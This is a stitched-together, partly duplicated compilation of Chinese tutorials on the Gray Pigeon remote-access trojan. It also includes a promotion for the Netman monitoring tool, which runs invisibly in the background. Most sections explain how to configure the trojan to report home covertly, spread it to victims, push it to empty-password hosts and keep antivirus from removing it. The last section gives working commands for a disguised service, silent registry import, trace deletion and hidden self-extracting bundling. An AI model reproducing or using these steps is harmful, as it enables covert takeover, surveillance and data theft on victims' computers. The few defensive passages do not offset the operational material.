灰鸽子远程控制教程
灰鸽子原理及上线方法剖析
原创作者unis远程控制分类与远程协助区别远程控制技术是黑客必学的技术之一。
远程控制不同于远程协助,两者之间有很大的区别,所谓远程协助需要经过被控端的授权允许,并且被控端可以看到控制者的所有操作,使之控制操作透明性;例如我们的QQ远程协助,就需要对方的允许控制进行操作,并且对方也能够看到我们的操作动作,远程协助一般是用来进行远程的计算机操作协助。
远程控制则不一样,远程控制只要在被控者电脑安装一个服务端,即可在不知情的情况下进行控制对方计算机以及对计算机其它操作,控制时不需要经过对方的许可就可以控制,而控制时操作的一些动作,对方也无法察觉到(除鼠标控制)。
远程控制按控制类型可以分类为:(1)正向主动型远程控制(2)反向被动型。
什么是正向主动型的呢?正向主动型是需要控制着主动去连接被控端,一般情况下,控制者必须知道需要被控制者的IP和端口,然后通过某种软件来进行控制被控者,例如微软的3389远程桌面、Radmin远程控制、VNC远程控制都需要知道对方的IP(端口)然后通过客户端软件进行连接对方。
反向被动型控制又可以称为反弹性控制技术,指的是在被控端下安装服务端之后,由被控端主动来寻找你的客户端监听端口软件连接来进行控制,这个好处就是不需要知道对方的IP地址和端口,被控端会自己主动来找我们的监听地址和端口,当我们发现被控端已经找到我们的监听地址和端口,我们就可以控制对方电脑,这样省去要知道对方的IP和端口的麻烦了,特别是对方是动态IP的时候。
反向被动型远控在黑客界已经是主流了,黑客专门使用某些控制软件在控制对方,反弹型远控软件更是数不胜数,例如:花鸽子(灰鸽子)、白金、终结者、Ghost 等等。
远程控制软件的功能与远控木马的特性我们这里主要讲解的是反弹型远控,并且也有讲解到Web型的正向型远控,正向型远控还有Radmin、3389远程桌面也可以值得大家去学习,关于Radmin远控的可以参考我之前写的《深度研究Radmin远控》。
灰鸽子使用教程图解
灰鸽子使用教程图解(考虑到灰鸽子技术性较强和传插黑客技术要低调,将网络人远程控制教程放第一部份,灰鸽子教程放在了文章后面第二部份,请大家耐心观看)第一部份:网络人远程监控软件网络人远程控制个人版分为Netman办公版与Netman监控版。
两个版本主要区别在于:Netman办公版连接远程电脑时,对方会弹出提示,知道电脑正在远程连接,主要用于个人远程控制、远程办公、远程协助和远程桌面连接等方面使用,是一款免费的远程控制软件;Netman监控版使用会员登录后再连接,远程电脑无任何提示,对方不会发觉,主要用于监管孩童电脑,掌握孩子上网情况,保护孩子健康上网。
Netman监控版详细安装方法:1.要实现远程监控控制,双方都要安装Netman监控版,双方电脑的安装方法一样,控制端同时也是被控端,只要知道ID和密码,双方可以互相控制。
2.下载软件解压缩后,双击“Netman监控版.EXE”,软件默认安装路径为“C:\Program式,需要自己进入安装文件夹,双击iexplore.exe启动软件,这时会弹出一个提示窗口,问是否要让软件随系统启动,通常直接点“确定”。
3.完成以上操作后,再按ctrl+y即可呼出软件主界面。
监控版必须使用会员登录才能实现监控功能,所以呼出主界面后,应点击免费注册会员。
4.注册好会员后,点“选项”-“会员登录”,填上注册好的会员号。
5.第一次使用会员登录时,会弹出“设置控制密码”选项,需要注意的是,这里修改的不是前面填写的“登录密码”,而是从其他电脑连接本电脑时需要输入的“控制密码”。
很多用户会误以为这里是修改“登录密码”,导致第二次使用会员登录时,发现登录密码不正确。
出于安全考虑,网络人设置了“登录密码”与“控制密码”两道密码保护,“登录密码”用于登录会员ID,“控制密码”则是其他电脑想要控制本地电脑时所需要填写的密码。
想要修改这两个密码,可点击“选项”-“修改密码”。
6.设置好密码密码后,点右上角的关闭按扭,软件就会在后台运行,桌面上看不到任何图标和提示。
(整理)灰鸽子远程控制完整详细教程
灰鸽子远程控制完整详细教程(考虑到灰鸽子技术性较强和传插黑客技术要低调,将网络人远程控制教程放第一部份,灰鸽子教程放在了文章后面第二部份,请大家耐心观看)第一部份:网络人远程监控软件Netman监控版详细安装方法:1.要实现远程监控控制,双方都要安装Netman监控版,双方电脑的安装方法一样,控制端同时也是被控端,只要知道ID和密码,双方可以互相控制。
2.下载软件解压缩后,双击“Netman监控版.EXE”,软件默认安装路径为“C:\Program Files\Netman”,可以自己修改,但安装路径需要记住,因为启动软件桌面上不会新建快捷方式,需要自己进入安装文件夹,双击iexplore.exe启动软件,这时会弹出一个提示窗口,问是否要让软件随系统启动,通常直接点“确定”。
3.完成以上操作后,再按ctrl+y即可呼出软件主界面。
监控版必须使用会员登录才能实现监控功能,所以呼出主界面后,应点击免费注册会员。
4.注册好会员后,点“选项”-“会员登录”,填上注册好的会员号。
5.第一次使用会员登录时,会弹出“设置控制密码”选项,需要注意的是,这里修改的不是前面填写的“登录密码”,而是从其他电脑连接本电脑时需要输入的“控制密码”。
很多用户会误以为这里是修改“登录密码”,导致第二次使用会员登录时,发现登录密码不正确。
出于安全考虑,网络人设置了“登录密码”与“控制密码”两道密码保护,“登录密码”用于登录会员ID,“控制密码”则是其他电脑想要控制本地电脑时所需要填写的密码。
想要修改这两个密码,可点击“选项”-“修改密码”。
6.设置好密码密码后,点右上角的关闭按扭,软件就会在后台运行,桌面上看不到任何图标和提示。
想要再次操作软件,请按下ctrl+y键。
右上角的关闭按扭只是将软件界面关闭,想要彻底退出软件,应点击左上角的“文件”-“退出”。
很多用户想要卸载软件时,发现无卸载,就是因为没有退出程序造成。
7.有同样的方法在另一台电脑安装Netman监控版并使用另一个会员登录,在“远程IP/ID”处输入对方的会员ID和控制密码,点击“连接”即可连接远程电脑。
灰鸽子教程
现做个简易的攻略给你吧,本人鄙视盗版...
首先自动上线那一栏,去申请一个ftp的帐户,然后在鸽子那相应填写得到的ftp域名和ftp上传帐号(注意:是上传账号,不是登陆账号,上传账号一般只是4~5位数字)和ftp登陆密码,如图:
相应都填写好了之后点击“更新ip到ftp 空间”,配置正确的话就会显示“ftp 更新ip文件成功”,如图:
如果更新不成功,你就要倒回去看看哪步没做好了。
接下来是配置服务端,在“自动上线设置”那一栏的第一个空填写我们的静态
ip(即固定ip,如果你是adsl宽度上网的话,你会有两个ip,一个是静态的、一个是动态的,动态的每次联网都是会变的,而固定则反,怎么区别不用我说了吧)...
但如果你是在内网用调解器或路由器拨号上网的话,这就有点麻烦。
去希网
申请一个账号,申请了账号并登陆后依次点击“管理域名”——“动态域名”——“新建”,填写确定新建一个动态域名,然后点击右上角的“客户端下载”下载一个希网的客户端(很小,才几MB),安装完后运行,点击“管理账号”,填入我们刚申请的域名、用户名和密码(即口令),如图所示:
填好后点击“增加”,等验证后会显示“可用”字样,保持我们的客户端不要关闭,缩小它,然后就可以用我们申请的域名来代替固定ip填写我们的鸽子服务
端的上线了,如图:
其他的设置按照个人喜好而定,接着我们就生成服务器,就完成了。
在这里个人推荐使用第二种方法的鸽子服务端上线,也就是希网上线(类似的“花生壳”也可以),它具有稳定、快速的特点,但注意每次上线都要保持着我们的客户端开着才行。
灰鸽子病毒的原理和运行方式是怎么样的
灰鸽子病毒的原理和运行方式是怎么样的灰鸽子远程病毒我想谁都不陌生吧?曾经控制着我们电脑,信息恶意传播,你知道灰鸽子病毒的原理和运行方式吗?下面由店铺给你做出详细的灰鸽子病毒的原理和运行方式介绍!希望对你有帮助!灰鸽子病毒的原理和运行方式介绍:灰鸽子远程监控软件分两部分:客户端和服务端。
黑客(姑且这么称呼吧)操纵着客户端,利用客户端配置生成出一个服务端程序。
服务端文件的名字默认为G_Server.exe,然后黑客通过各种渠道传播这个服务端(俗称种木马)。
种木马的手段有很多,比如,黑客可以将它与一张图片绑定,然后假冒成一个羞涩的MM通过QQ把木马传给你,诱骗你运行;也可以建立一个个人网页,诱骗你点击,利用IE漏洞把木马下载到你的机器上并运行;还可以将文件上传到某个软件下载站点,冒充成一个有趣的软件诱骗用户下载……,这正违背了我们开发灰鸽子的目的,所以本文适用于那些让人非法安装灰鸽子服务端的用户,帮助用户删除灰鸽子 Vip 2005 的服务端程序。
本文大部分内容摘自互联网。
G_Server.exe运行后将自己拷贝到Windows目录下(98/xp下为系统盘的windows目录,2k/NT下为系统盘的Winnt目录),然后再从体内释放G_Server.dll和G_Server_Hook.dll到windows目录下。
G_Server.exe、G_Server.dll和G_Server_Hook.dll三个文件相互配合组成了灰鸽子服务端,有些灰鸽子会多释放出一个名为G_ServerKey.dll的文件用来记录键盘操作。
注意,G_Server.exe这个名称并不固定,它是可以定制的,比如当定制服务端文件名为A.exe 时,生成的文件就是A.exe、A.dll和A_Hook.dll。
Windows目录下的G_Server.exe文件将自己注册成服务(9X系统写注册表启动项),每次开机都能自动运行,运行后启动G_Server.dll 和G_Server_Hook.dll并自动退出。
灰鸽子使用教程 灰鸽子如何使用?
灰鸽子使用教程灰鸽子如何使用?
导读:灰鸽子是一款远程控制软件,不过这款软件刚推出的时候是定义为公司和家庭管理的软件,由于软件设计存在缺陷,被黑客恶意使用,使得这款软件被定义为木马程序。
下面给大家介绍灰鸽子的使用教程。
1、先下载灰鸽子软件,大家没有的可以下载灰鸽子软件的;
2、打开后灰鸽子,我们先点击ftp更新我们的动态域名;
3、更新成功在打开配置服务端,写上更新好的域名;
4、这里是运行后服务端释放的目录,大家根据自己的要求来写;
5、这个是选择用什么进程的名字,我这个是使用ie进程;
6、配置好后,就是有一个Server.exe,运行后就可以在主控端里面看到了;
7、主控端显示的界面就是这样的;
灰鸽子这款软件本身是不具备传播性的,一般是他人通过捆绑的方式进行传播,传播方式有网页传播、邮件传播、IM聊天工具传播、非法软件传播。
灰鸽子远程控制完整详细教程
灰鸽子远程控制完整详细教程(考虑到灰鸽子技术性较强和传插黑客技术要低调,将网络人远程控制教程放第一部份,灰鸽子教程放在了文章后面第二部份,请大家耐心观看)第一部份:网络人远程监控软件Netman监控版详细安装方法:1.要实现远程监控控制,双方都要安装Netman监控版,双方电脑的安装方法一样,控制端同时也是被控端,只要知道ID和密码,双方可以互相控制。
2.下载软件解压缩后,双击“Netman监控版.EXE”,软件默认安装路径为“C:\Program Files\Netman”,可以自己修改,但安装路径需要记住,因为启动软件桌面上不会新建快捷方式,需要自己进入安装文件夹,双击iexplore.exe启动软件,这时会弹出一个提示窗口,问是否要让软件随系统启动,通常直接点“确定”。
3.完成以上操作后,再按ctrl+y即可呼出软件主界面。
监控版必须使用会员登录才能实现监控功能,所以呼出主界面后,应点击免费注册会员。
5.第一次使用会员登录时,会弹出“设置控制密码”选项,需要注意的是,这里修改的不是前面填写的“登录密码”,而是从其他电脑连接本电脑时需要输入的“控制密码”。
很多用户会误以为这里是修改“登录密码”,导致第二次使用会员登录时,发现登录密码不正确。
出于安全考虑,网络人设置了“登录密码”与“控制密码”两道密码保护,“登录密码”用于登录会员ID,“控制密码”则是其他电脑想要控制本地电脑时所需要填写的密码。
想要修改这两个密码,可点击“选项”-“修改密码”。
6.设置好密码密码后,点右上角的关闭按扭,软件就会在后台运行,桌面上看不到任何图标和提示。
想要再次操作软件,请按下ctrl+y键。
右上角的关闭按扭只是将软件界面关闭,想要彻底退出软件,应点击左上角的“文件”-“退出”。
很多用户想要卸载软件时,发现无卸载,就是因为没有退出程序造成。
7.有同样的方法在另一台电脑安装Netman监控版并使用另一个会员登录,在“远程IP/ID”处输入对方的会员ID和控制密码,点击“连接”即可连接远程电脑。
详细讲解远程控制(内外网上线+使用教程及不上线的原因总结)
教程及其相关知识法律声明中华红客技术交流基地,网站论坛所涉及所有动画课程、软件、文章仅供为提高电脑技术,普及中国网络安全服务,以求电脑技术爱好者交流探讨为参考,严禁任何组织和个人利用此动画教程培训软件侵入他人电脑等非法活动,中华红客技术交流基地无授意指使他人为之之故意,造成损害中华红客技术交流基地概不负责任何法律责任中华红客技术交流基地基地论坛:阶段一:实战攻防篇课程主题:第一课:详细讲解远程控制**(内外网上线+使用教程及不上线的原因总结)讲师:习惯就好.如何判断自己电脑是否内网:方法一:开始---cmd---ipconfig 出现以下10.x.x.x;172.16.x.x至172.31.x.x;192.168.x.x;环境准备:要使用到的工具+环境准备:域名一个 ww 或者(花生壳域名)+远程控制远程控制下载地址:/42/thread-27658-1-1.html内网讲解:内网用户鸽子上线方法,常用的是端口映射方法.分成二种情况.第一种:如果有路由器的控制权,可以进入路由器设置,把鸽子上线端口映射出去.第二种:没有路由控制权,只能找公网肉鸡做映射.第一种:(路由器上线方法)第一步:路由器上线方法首先,我们关闭windows防火墙和暂停杀毒软件。
我已经关闭了。
我们打开黑防灰鸽子,灰鸽子的自动上线端口是:8000,当然你也可以改成其它的端口。
我们打开“命令提示符”输入:ipconfig /all 查看本机的IP ,本机的IP是:192.168.1.254现在我们要打开路由器,在浏览器的地址栏输入:192.168.1.1。
(如果你的路由器的IP地址改变了,你就输入相应的路由器的IP地址。
)我的没有改。
要输入帐号和密码,我用的是TP-LINK路由器,我这个路由器默认的帐号和密码是:admin 和admin。
(当然如果你改变了帐号和密码,你就要输入你改了之后的帐号和密码了)我们点击“转发规则”选择第一项“虚拟服务器”,输入端口号8000:和本机的IP:192.168.1.254也可以进入转发规则,进入DMZ主机,直接填写本机的IP地址:192.168.1.254。
实验八 灰鸽的内网上线配置
2014、04、05
实验目的、内容
实验目的:本实验主要学习远程控制软件---灰鸽子的使用和内网配置方法
实验仪器设备:计算机
实验环境:Windows 2000 Server、灰鸽子软件、IPC扫描器
实验内容:
1、首先进行灰鸽子的配置
(1)双击运行灰鸽子软件,这里使用的是灰鸽子暗组专版,界面如图
2.使用IPC扫描器将服务程序上传到所有空口令主机上并运行。如图:
3.过几分钟等服务程序在扫描到的主机上运行后,在灰鸽子上我们看到自动上线主机,这时我们就可以远程监视以及控制对方的主机了。
实验设计过程
调试过程记录
实验结果记录以及与预期结果比较以及分析
总结以及心得体会
通过本次实验,我明白了当使用在合法情况下时,灰鸽子是一款优秀的远程控制软件。但如果拿它做一些非法的事,灰鸽子就成了很强大的黑客工具。
(2)进行灰鸽子的服务端的配置。
a.单击工具栏的“配置服务程序”按钮,打开配置服务程序界面。
b.单击“自动上线配置”选项卡,在“IP通知http访问地址、DNS解析域名或固定IP”栏中输入本机的IP地址。本机的IP是:172.16.28.2。
c.单击“自动上线配置”选项卡,如图
在“安装路径”里设置服务端的安装路径,这里我们使用默认,在实际操作中可以根据需要选择安装路径。
在“程序图标”里选择程序的图标。然后选择“安装成功后自动删除安装文件”
d.单击“启动项设置”选项卡,如图:
选中“win98/2000/xp下写入注册表启动项”和“win2000/xp”下优选安装成服务启动两项。
在“显示名称”、“服务名称”和“描述信息”里分别填上相关信息。
e.在保存路径里设置程序保存的路径,单击“生成服务器”,生成服务器程序。
灰鸽子配置详细讲解
这段话很关键,很多新手别配置不成的原因就是在这
我网站 放IP文件的地方是在databases下, 所以我输入的IP文件地址就是/databases/ip.txt
我添一下
4.然后自动保存的那个框要打钩哦
接着就可以 更新IP到FTP空间 了
是添你的网站后台里放IP。TXT的地方 不懂的可以看下后面的 说明
存放IP文件说明:
这里是远程FTP路径加文件名。如果是保存在FTP根目录下就直接写文件名。
示例:/目录名/文件名
如果使用了目录名请保证FTP目录已经存在
其中
“ 这里是远程FTP路径加文件名。如果是保存在FTP根目录下就直接写文件名。
FTP更新IP文件成功的!
本人是新手 特寻一位师傅,QQ:348387596 ゞ忝嘡/~↘斌
结束!
1.FTP服务器
添你申请的那个域名 我就添 端口21 我们就不用改了
2.用户名 密码
要添你申请的域名的登入帐号和密码我的用户名是cangkuwang 密码~·#¥%……就不说了
呵呵
连接类型别换 一定是要PASV的
3.存放IP的文件
我建在C盘里
然后那个主目录就可以设置成C盘喽!!
2.服务端口
要添的是 21 而不是2121 我们改下就行!
3.用户名
一定不要匿名哦 ! 什么原因我也不清楚 呵呵!
你随便添一个 比如我添的就是123
密码也一样随便添一个 我添123
4.钩上下面两个框 自动保存目录和端口信息 and 程序启动时自动开启FTP服务
大家好!我是 ゞ忝嘡/~↘小斌。
今天为大家演示一下灰格子的配置过程!
灰鸽子木马原理
灰鸽子木马原理一、什么是灰鸽子木马灰鸽子木马是一种具有高度隐蔽性和持久性的远程控制软件。
它通常通过钓鱼邮件、恶意下载和网络漏洞利用等方式传播,目的是植入受害者计算机系统,并使黑客能够远程控制和监控计算机。
灰鸽子木马得名于它使用灰鸽子作为其标志性图标。
二、灰鸽子木马的传播方式1.钓鱼邮件:黑客通过发送看似合法和诱人的邮件,含有携带灰鸽子木马的附件或恶意链接。
当受害者打开附件或点击链接时,木马会悄悄地进入系统。
2.恶意下载:黑客会在一些不安全的网站上发布包含恶意代码的软件或文件。
当用户在这些网站上下载并安装软件时,木马就会感染受害者的计算机系统。
3.网络漏洞利用:黑客会利用已知的系统漏洞来传播灰鸽子木马。
他们通过扫描网络,寻找可利用的漏洞,并通过这些漏洞远程感染受害者的计算机。
三、灰鸽子木马的工作原理灰鸽子木马主要包括三个核心部分:客户端程序、服务器端程序和控制面板。
1.客户端程序:客户端程序是指感染了受害者计算机的木马程序。
一旦成功感染,客户端程序便开始在计算机中植入和运行。
它通过窃取敏感信息或监控用户行为来完成黑客的意图。
2.服务器端程序:服务器端程序是黑客控制灰鸽子木马的中央管理系统。
黑客使用服务器端程序来监控和控制感染了客户端程序的计算机。
3.控制面板:控制面板是黑客使用的用户界面,它允许黑客查看和操纵感染了灰鸽子木马的客户端计算机。
通过控制面板,黑客可以发送指令、收集信息和执行各种操作。
灰鸽子木马主要通过以下方式实现远程操控和监控:1.启动自动运行:灰鸽子木马会在感染计算机时添加自启动项,确保在计算机启动时自动运行,以保持持久性。
2.反向连接:客户端程序会与服务器端程序建立一个隐藏的反向连接,使黑客能够远程访问受感染计算机的指令和数据。
3.远程执行命令:黑客可以通过控制面板发送指令给感染了灰鸽子木马的客户端计算机,实现远程执行命令。
4.收集敏感信息:客户端程序可以记录受害者的键盘输入、屏幕截图和网络流量等信息,并将其传输到服务器端程序。
恢鸽子配置上线
恢鸽子+“每步域名解析”实现内网远控大家好,我是哭的虫子,今天就来给大家讲解一下如何利用ADSL家庭拔号实现远程控制。
首先,我们先下载一下鸽子。
我用的是“火狐2008恢鸽子”,这个大家可以在网上下载,我就不多讲了,然后,我们再申请一个免费的域名解析,以前用“花生壳”,最近发现不太好用了,所以我就改成“每步免费域名解析”,网址是:/khd.asp大家可以去申请一个,很简单的,我就不多讲了。
我们先打开“每步”客户端,名字叫做“稻草人2.0”。
如下图:把申请好的域名及密码填写后,登陆,就可以看到右上角的解析IP了。
下面,我们来打开鸽子,配置一下。
如下图:注意,下载“每步”客户端时,一定要下载带有“自动端口映射”的版本。
好啦,病毒我们生成好啦,我们到刚才生成的路径下去找吧。
把Server.exe这个病毒放在想要控制的电脑上,双击一下就可以了。
至于如何放在别人电脑上,这就要大家各想其招了。
注意:在安装时,一定要先把杀毒软件给关掉,装好后,再打开杀毒软件,进行一下快速查杀,但在查杀时,一定不能选择杀软的“自动处理”功能,如下图:我们先来用“QQ电脑管家”来查杀一下吧。
这“QQ 软件管理软件”扫描后信任的文件。
接下来,我们再来用“金山毒霸”来查杀一下,如下图:一定要先设置成“手动处理”,不然,金山会在查到时就把咱们的病毒给干掉了。
到此,鸽子上线配置讲完了,有些人说配置的鸽子不能上线,在这里,我要跟大家说说,这种情况有以下几种:一、如果是用路由器上网的,要把路由器中的“转发规则”里面做一下端口映射,鸽子的端口一般是8000这个端口,别填错了。
不同的路由器,设置也不一样,大家可以根据自己的路由器在网上找一下设置的方法。
二、你的电脑本身中毒,要知道,天下没有免费的午餐,你所下载的鸽子,有可能是有后门的,也就是说,你所配置的鸽子其实是给别配的,你所抓的鸡也是给别人抓的,所以当你配置好鸽子服务端时,总是收不到上线通知,那你只有杀毒了,再不然,重做一下系统。
灰鸽子2010黑防专版教程
灰鸽子2010黑防专版点击右侧下载列表下载1.只用一个端口来传输所有通讯数据!普通同类软件都用到了两个或两个以上的端口来完成!2.支持可以控制Internet连接共享、HTTP透明代理上网的电脑!软件智能读取系统设定的代理服务器信息,无需用户设置!3.无需知道服务端IP,自动上线功能让服务端自动上线报道!灰鸽子专用的上线系统无需您注册免费域名才能使用,同时也提供了备用上线方式,在我们的专用上线系统出现故障时,您可以使用备用上线方式来使用自动上线功能。
在使用专用上线系统时,你还可以控制远程电脑通过Socks5代理来中转自动上线。
4.自动上线可以在第一次设置分组,自定义上线图像,上线备注等,这样都可以让你轻而易举的找到目标主机,同时设置连接密码保证了服务主机的安全性!同时具用牵手版的搜索符合条件主机的功能:a.从主机窗口筛选:可以列出只有某个窗口的一批主机,可以轻松找到哪些人在玩某个游戏!b.从主机进程筛选:可以列出运行了某个程序的一批主机,例如QQ.exe,就可以找到打开了QQ的自动上线主机有哪些了!5.文件管理:管理远程电脑的文件系统,支持复制、粘贴、删除,断点下载、上传文件或文件夹,文件内容均以加密方式传输,确保通讯的安全性.6.远程控制命令:包括远程系统信息、剪切板信息、进程管理、窗口管理、键盘记录、服务管理、管理管理、MS-DOS模拟、代理服务控制!7.注册表编辑器:可以像操作本机注册表一样的编辑远程注册表。
8.常用命令广播,让你控制主机众多主机更多的方便!详细的在线主机线表显示了:主机IP地址,地址位置,电脑名称,系统版本,备注等信息,9.除了具有语音监听、语音发送,还有远程视频监控功能,只有远程计算机有摄像头,且正常打开没有被占用,那么你可以看到,远程摄像头捕获的图片!还可以把远程摄像头捕获的画面存为Mpeg-1格式.远程语音也可以录制成Wav声音文件。
10.可以设置服务端开放Socks5代理服务器功能和HTTP代理服务功能!无需第三方软件支持!支持W indows9x/ME/2000/Xp/2003。
后灰鸽子时代的远程控制软件
后灰鸽子时代的远程控制软件
灰鸽子是一个集多种控制方法于一体的木马病毒,用户电脑一旦感染此灰鸽子,就沦为黑客肉鸡。
可以说用户的一举一动都在黑客的监控之下,黑客利用灰鸽子盗取用户数据、资料、账号信息都是轻而易举的。
更具危害的是黑客还能利用灰鸽子远程监控被感染病毒用户的电脑桌面,还可以强制打开电脑的摄像头,进行拍照和录像。
在灰鸽子横行的时代,可以说人人谈其色变,都担心自己的电脑感染灰鸽子病毒。
还好最后邪不胜正,主流的安全软件都对灰鸽子具有强大的查杀能力,最终不能危害到广大网民。
就如同计算机一开始是用来计算炮弹弹道轨迹用来破坏与毁灭,后来军用转为民用一样,类灰鸽子的远程控制软件如今主要用于企业对于员工的管理、家长对小孩的监督,也可以说是改邪归正了。
南宁网络人电脑有限公司历时1年多,深入研究灰鸽子代码,取其精华,去其糟粕,针对企业的需求研发出国内唯一一款可以穿透内网的远程控制软件。
为了使企业能放心使用,网络人远程控制软件专门申请了国家公安部的软件病毒检测,并获得了相应的证书及软件销售许可证,最近也申请了微软的数字证书并通过各大安全软件,从根本上与木马病毒区分开来,让广大用户在感受到远程监控软件方便的同时不必担心沦为黑客肉鸡。
为了使毫无计算机基础的用户也用上如此高技术含量的软件,网络人远程控制软件做得非常人性化,无需做复杂的端口设置,仅需双方下载安装登录相同的账号即可,是所有远程控制软件中最简单的一款了。
使用简单但是功能强大是网络人远程控制软件最大的特色了,具有权限管理功能,超级管理员可以添加多个普通管理员,并设定其权限,方便多位管理者共同远程管理公司职员电脑,监督职员工作,防止上班处理私事、私自外泄公司机密信息。
- 1、下载文档前请自行甄别文档内容的完整性,平台不提供额外的编辑、内容补充、找答案等附加服务。
- 2、"仅部分预览"的文档,不可在线预览部分如存在完整性等问题,可反馈申请退款(可完整预览的文档不适用该条件!)。
- 3、如文档侵犯您的权益,请联系客服反馈,我们会尽快为您处理(人工客服工作时间:9:00-18:30)。
灰鸽子远程控制教程灰鸽子远程控制,著名木马灰鸽子远程控制工具,附带中文版键盘记录,多功能图标修改器等!准备工具:鸽子服务端IcoSprite图标更改器;SC.exe服务添加删除更改工具;winrar程序特点:自解压形式,双击即可制作过程:1. 首先自己配置一下鸽子服务端,配置时[启动项设置]这里面的都不要填,不要写入注册表,也不要用服务启动。
其他的随你个人爱好。
2.用SC创建一个服务运行CMD.EXE 在system32的目录下运行执行SC.exe create huigezi BinPath= "%systemroot%\system32\gezi.exe" type=own type= interact start= auto DisplayName= "gezi"‘这句是用SC建立一个服务,服务名为huigezi,路径Binpath为"%systemroot%\system32\gezi.exe",类型type为own 与interact交互,启动类型start为自动,显示名DisplayName为"gezi"。
sc.exe descript_ion huigezi "不死鸽子"‘这句是将huigezi服务的描述改为“不死鸽子”sc config wuauserv depend= huigezi‘配置huigezi使wuauserv服务依存此服务(wuauserv可以根据自己喜欢改成其它服务,这里的wuauserv是系统在Windows Update网站的自动更新服务)。
这里的目的是迷惑管理员,使其不敢轻易停止我们生成的服务,自己也可以多加点。
3.将这些从注册表导出,我个人经验是:瑞星,咔吧等的注册表监控不会对导入注册表报警. 我们将他命名为1.reg4.创建一个BAT文件,并命名为update.bat@regedit /s %systemroot%\system32\1.reg@%systemroot%\system32\gezi.exe@del /q /f /s %systemroot%\system32\1.reg@del /q /f /s %systemroot%\system32\Update.vbs@del /q /f /s %systemroot%\system32\Update.bat5.创建一个vbs并命名为update.vbs目的是为了作用是令bat里的内容以安静模式执行,这样就可以让cmd窗口跳出来了,增加了不少隐蔽性。
里面写上如下代码:On Error Resume Nextset wshshell=createobject ("wscript_.shell")a=wshshell.run ("cmd.exe /C %systemroot%\system32\Update.bat", 0, TRUE)6.用我门配置出来的服务端,并命名为run.exe,用run.exe做一个自解压文件,并命名为gezi.exe.。
记得将解压模式为全部隐藏.解压后运行run.exe,当然你的服务端要自己做免杀,这里我就不多说了。
八仙过海....7.将gezi.exe 1.reg Update.vbs Update.bat 再用winrar制作一个自解压文件,解压到%systemroot%\system32\ 解压后运行Update.vbs 当然解压模式依旧全部隐藏,替换同名文件现在用rar捆绑出来的文件很多杀软都不杀,你也可以用系统自带的捆绑机,或其他的捆绑机这个方法可以用到其他的木马中捆出来的自解压文件也可以自己再加工:去掉右键用"winrar打开"灰鸽子第一章:软件相关介绍:灰鸽子[VIP 专业版]1.只用一个端口来传输所有通讯数据!普通同类软件都用到了两个或两个以上的端口来完成!2.支持可以控制Internet连接共享、HTTP透明代理上网的电脑!软件智能读取系统设定的代理服务器信息,无需用户设置!3.无需知道服务端IP,自动上线功能让服务端自动上线报道!灰鸽子专用的上线系统无需您注册免费域名才能使用,同时也提供了备用上线方式,在我们的专用上线系统出现故障时,您可以使用备用上线方式来使用自动上线功能。
在使用专用上线系统时,你还可以控制远程电脑通过Socks5代理来中转自动上线。
4.自动上线可以在第一次设置分组,自定义上线图像,上线备注等,这样都可以让你轻而易举的找到目标主机,同时设置连接密码保证了服务主机的安全性!同时具用牵手版的搜索符合条件主机的功能:a.从主机窗口筛选:可以列出只有某个窗口的一批主机,可以轻松找到哪些人在玩某个游戏!b.从主机进程筛选:可以列出运行了某个程序的一批主机,例如QQ.exe,就可以找到打开了QQ的自动上线主机有哪些了!5.文件管理:管理远程电脑的文件系统,支持复制、粘贴、删除,断点下载、上传文件或文件夹,文件内容均以加密方式传输,确保通讯的安全性.6.远程控制命令:包括远程系统信息、剪切板信息、进程管理、窗口管理、键盘记录、服务管理、管理管理、MS-DOS模拟、代理服务控制!7.注册表编辑器:可以像操作本机注册表一样的编辑远程注册表。
8.常用命令广播,让你控制主机众多主机更多的方便!详细的在线主机线表显示了:主机IP地址,地址位置,电脑名称,系统版本,备注等信息,9.除了具有语音监听、语音发送,还有远程视频监控功能,只有远程计算机有摄像头,且正常打开没有被占用,那么你可以看到,远程摄像头捕获的图片!还可以把远程摄像头捕获的画面存为Mpeg-1格式.远程语音也可以录制成Wav声音文件。
10.可以设置服务端开放Socks5代理服务器功能和HTTP代理服务功能!无需第三方软件支持!支持Windows9x/ME/2000/Xp/2003。
11.软件附带有四款实用工具:a. EXE工具: 可以修改任何EXE文件图标,支持真彩色!b. 内网端口映射器:它允许你将局域网内的服务映射到internet上,使你在局域网内部也能使用自动上线功能!c. FTP服务器: 可以开本机FTP服务!d. Web服务器: 可以建立一个简单的Web服务器!12.服务端程序在Windows 2000 / xp / 2003 可以以服务启动,支持发送多种组合键,比如:Ctrl+Alt+del等等,适用于管理服务器主机!远程屏幕捕获还可以录制为Mpeg-1文件格式.13.全中文友好操作界面,让你一目了然,漂亮皮肤让使用时也倍感亲切!功能简单介绍:【1】对远程计算机文件管理:模枋Windows 资源管理器,可以对文件进行复制、粘贴、删除,重命名、远程运行等,可以上传下载文件或文件夹,操作简单易用。
【2】远程控制命令:查看远程系统信息、剪切板查看、进程管理、服务管理、共享管理!【3】捕获屏幕:不但可以连继的捕获远程电脑屏幕,还能把本地的鼠标及键盘传动作送到远程实现实时控制功能!【4】视频语音,可以监控远程摄像头,还有语音监听和发送功能,可以和远程主机进行语音对话!【5】telnet(超级终端).【6】注册表模拟器:远程注册表操作就像操作本地注册表一样方便!【7】命令广播:可以对自动上线主机进行命令广播,如关机、重启、打开网页,筛选符合条件的机等,点一个按钮就可以让N台机器同时关机或进行其它操作!【8】服务端以服务方式启动,支持发送多种组合键,可以轻松管理远程服务器!【9】专用的自动上线系统,直接使用灰鸽子注册ID即可实现远程服务端自动上线!【10】多种自动上线方式:专用上线、DNS解析域名、固定IP等,用户自由选择!注册灰鸽子软件后享有:⒈享用软件的所有功能,没有任何限制!⒉能使用对应的灰鸽子注册版本,能得到此版后期修正的正式版本!⒊可以使用我们的专用上线系统,无需其它域名和空间支持!⒋得到我们更好的技术服务!注:[VIP版] 包括VIP2005、Version 1.2、Version 2.0 ![企业版]用户只能使用企业版!不能使用其它版本!5.加入会员后,会自动加入官方论坛。
享受官方技术支持灰鸽子第二章:好马配好鞍,服务端正确配置。
灰鸽子是一款要交钱的软件,也就是说,你使用VIP版的话是要交给作者每年几十块钱的使用费(不作任何评论)因此网上也就有很多高手破解灰鸽子,让灰鸽子可以不用到灰鸽子的官方网站进行验证,从而可以不用交钱就可以使用,相关版本有:影子鹰破解专用版,爱儿破解版,以及华夏黑客联盟的灰鸽子sunray破解版。
今天我们就用"灰鸽子sunray破解版"来向大家详细解析这款木马的服务端配置方式,只可实验,不可做坏事,大家不喜欢请跳过这一章。
第一节:未雨绸缪,实验准备。
